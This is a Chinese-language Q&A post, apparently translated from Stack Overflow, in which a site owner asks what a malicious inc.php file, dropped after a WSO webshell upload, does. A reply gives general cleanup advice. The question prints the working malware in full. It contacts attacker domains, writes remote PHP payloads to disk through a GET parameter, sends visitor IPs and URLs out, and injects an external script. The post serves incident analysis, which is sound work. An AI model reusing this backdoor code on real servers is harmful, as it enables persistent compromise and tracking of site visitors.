有人将此脚本上传到我们的服务器上
https://github.com/mIcHyAmRaNe/wso-webshell
我们在服务器上的不同目录中发现了inc.php文件。inc文件中包含以下代码
<?php
error_reporting(0);
$s='http://a1b2cd.club/';
$host = str_replace('www.', '', @$_SERVER['HTTP_HOST']);
$x = $s.'l-'.base64_encode($host);
if(function_exists('curl_init'))
{
$ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
if($gitt == false){
@$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
@$gitt = file_get_contents($x);
}
echo $gitt;
if(isset($_GET['ksfg'])){
$f=fopen($_GET['ksfg'].'.php','a');
fwrite($f,file_get_contents($s.'s-'.$_GET['ksfg']));
fclose($f);
}
echo '<!DOCTYPE html!>';
?><?php
function GetIP(){
if(getenv("HTTP_CLIENT_IP")) {
$ip = getenv("HTTP_CLIENT_IP");
} elseif(getenv("HTTP_X_FORWARDED_FOR")) {
$ip = getenv("HTTP_X_FORWARDED_FOR");
if (strstr($ip, ',')) {
$tmp = explode (',', $ip);
$ip = trim($tmp[0]);
}
} else {
$ip = getenv("REMOTE_ADDR");
}
return $ip;
}
$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(function_exists('curl_init'))
{
$ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
if($gitt == false){
@$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
@$gitt = file_get_contents($x);
}
?>
</marquee><script src=http://expoilt.com/ccb.js></script>
不知道这个脚本对我们的服务器做了什么。因为我们的服务器托管在上面,所以我们应该创建新的实例吗?或者我们是否应该从whm中暂停cpanel帐户并创建一个新帐户,然后将每个文件都复制到那里?请帮助我理解这段代码到底能做什么
发布于 2020-04-18 03:59:30
如果你被黑客攻击,首先尝试修改所有的密码,并重新检查自己添加的代码(最初的版本,直到第三方进入你的网站…也许让站点离线,直到检查...)。有可能有一个缺陷,这允许第三方上传任何想在你的网站!(这个问题必须解决)
关于添加的代码,基本上它列出了站点的内容和ip-s(以及一些重定向!对于普通用户来说非常危险)。但是无论第三党要做什么,都不知道!(当从外部获得管理员权限时,您可以说它现在是your_site所有者)。
https://stackoverflow.com/questions/61279553
复制相似问题